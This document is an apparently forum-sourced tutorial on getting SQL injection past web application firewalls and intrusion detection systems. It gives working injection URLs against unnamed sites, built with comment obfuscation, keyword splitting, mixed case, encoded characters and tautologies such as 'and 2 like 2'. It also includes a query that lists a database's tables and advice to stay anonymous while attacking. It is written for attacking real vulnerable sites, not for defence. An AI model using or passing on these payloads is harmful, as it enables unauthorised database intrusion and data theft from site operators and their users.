Windows Application Firewall bypassing and Intrusion Detection
Tutorial provided by
InQontroll |
First of all what do you need?
* A vulnerable webstite. (error based)
* Text Editor to write down all filtered out options.
Part 1: WAF bypassing
+-- Short explenation.
+-- Comments we can use.
+-- Spliting, replacing keywords.
+-- Capitalization.
+-- Combining methode's.
+-- Using characters.
+-- Split the sql statement.
+-- Encoding characters.
Part 2: Intrusion detection.
+-- Short explenation.
+-- Comments we can use.
+-- Spliting, replacing keywords.
+-- Capitalization.
+-- Combining methode's.
+-- Using characters.
+-- Split the sql statement.
+-- Encoding characters.
Part 2: Intrusion detection.
WAF Bypassing
WAF, Web Application Firewall is an attempt from administratord to secure the network
but only with a filter we all know you can't do that 100%.
WAF bypassing is not that easy remember this
WAF bypassing is gambling
If the one word is filtered try another
Stay trying and combining until you get a hit
How does a WAF file look like?
Code:
/*
$_GET = array_map('trim', $_GET);
//$_POST = array_map('trim', $_POST);
$_COOKIE = array_map('trim', $_COOKIE);
$_REQUEST = array_map('trim', $_REQUEST);
if(get_magic_quotes_gpc()):
$_GET = array_map('stripslashes', $_GET);
//$_POST = array_map('stripslashes', $_POST);
$_COOKIE = array_map('stripslashes', $_COOKIE);
$_REQUEST = array_map('stripslashes', $_REQUEST);
endif;
$_GET = array_map('mysql_real_escape_string', $_GET);
$_POST = array_map('mysql_real_escape_string', $_POST);
$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);
$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);
*/
// END OF ANTI MYSQL INJECTION
/* Logging */
$locatie = $_SERVER['REQUEST_URI'];
$array = Array();
$array[] = "mysql";
$array[] = "query";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "<script>";
$array[] = "</script>";
$array = Array();
$array[] = "mysql";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "INSERT";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "UPDATE";
$array[] = "COOKIE";
$array[] = "FILES";
$array[] = "POST";
$array[] = "REQUEST";
$array[] = "SERVER";
$array[] = "INSERT";
$array[] = "%40";
$array[] = "%20";
$array[] = "";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "WHERE";
$array[] = "VALUES";
$array[] = "SELECT";
$array[] = "FROM";
$array[] = "exit";
$array[] = "'";
$array[] = '"';
$array[] = ",";
$array[] = "`";
$array[] = "echo";
foreach($array As $posinject) {
if(eregi($posinject,$locatie)) {
$time = 'NOW()';
mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)
VALUES ('".ID."', '".$_SERVER[REMOTE_ADDR]."', '".$locatie."', '".$tijd."')") or die(mysql_error());
header("location: news.php");
exit();
}
}
This is a WAF PHP script
As you can see the filter out some important words and signs.
It logs IP 2. So it's important to be anonymous all the time.
Now the part comes where we need to bypass all of this.
WAF bypassing - comments we can use
First of all i would like you to have a look at these comments.
because these will bypass alot allready.
how do we do this, where do we use them and what do they exactly do.
Well let's start with /**/, (), #, --, +--+,--+-, -- -,,%20,/,//, < changing a . into, sometimes does the trick too.
/**/ this one is the most common to us.
it allows us to execute full words in our query without them being filtered out.
of course if the WAF has more then one filter this could get tricky.
Using comment in practice:
Code:
www.[site].com/index.php?id=-1+/*!union*/+select+1,2,3--+-
I get an error saying forbiden Somthing something ans whit the word select in it (if your lucky)
then i need to bypass the filter for select to
Code:
www.[site].com/index.php?id=-1+/*!union*/+/*!select*/+1,2,3--+-
but as you see in my WAF doc I am not that lucky
and I get redirected to news.php because the file says so
Let's try changing that with: +select+1,2,3--+-
Nope i got filtered out again.
WAF Bypassing - Spliting, replacing keywords
To go further where I ended before i am going to split the code instead of using the comments.
Code:
www.[site].com/index.php?id=-1+uni>on+sel>ect+1,2,3--+-
there will be cases this will work do not forget this one.
but not always.
There is another method called replacing the key words.
Code:
www.[site].com/index.php?id=-1+UNIunionON+SeLselectECT+1,2,3--+-
How does this work?
wel we all know the waf filteres out union and select.
look closely.
UNIunionON+ SELselectECT
he will filter out those 2 red words.
when he did that we requested exactly the same word at the database.
the filter is not good enough to replace that one.
if your lucky of course.
Another simple option
WAF Bypassing - Capitalization
Some other easy method is simply capitalizing the sql query's.
for example instead of union UnIoN this could escape our waf easely. (in some cases)!
WAF Bypassing - Combining Methods
We can combine this with comments and other WAF bypass methods. example:
Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCt+1,2,3--+-
Combining these could get you of radar fast. but this is all basic stuff people
You need to learn to combine as much as possible
without a brain you can't WAF Bypass
A full line getting tables could look like this
but it will probably get mutch worse
Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCT+1,2,group_concat(/*!table_name*/)+FrOM+/*information_schema*/,TaBlEs+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()- -
I also changed 2 other things here.
changing the . to a , as i said before could pass the waf radar.
and i changed the = at the end into like because it could also filter the = to something..
WAF Bypassing - using characters
By using a range of characters to bypass filter we could get true the waf.
following characters can do this:
Code:
[], ;, :, \/, $, €, |, ?, ", ', *, %, £ and lots more.
and lots more.by using these characters in lots of cases union and select are not filtered. but the sign * is.
which means replacing the keywords would not work. as shown before in my tutorial.
We could do this instead:
Code:
www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3--+-
this is not mutch change from spliting the keywords.
only here the *¨sign is filtered out. so the union+select wil be complete as soon as it is filtered.
some others. when filtered out.
we could do (uni)(on)+(sel)(ect)
or using the quotes 'uni"on'+'sel"ect' this does not work whit MsSQL
WAF Bypassing - Split SQL statement
In some cases parts of the SQL statement are filtered out. for example union.
or the select
This means by splitting this and only using id=-1+union+1,2,3--+- or the other way arround.
we could bypass the filter.
WAF Bypassing - encoding characters
By encoding characters for example the '
or the white space.
you could geth true the waf because he dous not filter encoded characters.
IN MOST CASES THEY DO.
this is for when you get stuck i guess.
you could look for double encoding characters searching google. ill previeuw a fieuw here.
single quote ' %u0027
open ( = %u0028
close ) = %u0029
and a white space %u0020
single encoding is almost always filtered by the waf. so try double.
Now we should have covered the basics.
lets step over to Filter evasion.
PART 2: Intrusion Detection!
Intrusion detection systems disable us from doing or 1=1.
we need to bypass this intrusion detection in order to check vuln.
Example of an intrusion detection system.
Code:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attack”;
flow: to_server, established; content: “' or 1=1 --”; nocase; sid: 1; rev:1;
This is of course the simpliest example i could give you.
This PHP code says:
alert when he gets this or 1=1 in his http server/ http ports so he displays a message: msg: "sql injection attack":
that's it. but they could filter out a lot more.
Let's take it easy
if the system sais. i cant do 1=1
phuh why wont i do 2=2 that simple.
but since or and = could be filtered apart from the or 1=1
Let's do this
and 2 like 2
that should work.
of course security guy wont give up.
Like does not work. then do this 1 < 2 this means 1 is smaller then 2. database should return true.
unless it is filtered.
We could do 2 > 1 2 is bigger then 1. true.
This is so easy its like math.
Let's do: and 1230 - 1 like 1229
works too
Using unicode to encode your input may work too
You could use different encodings too
This does not need anymore explanation I guess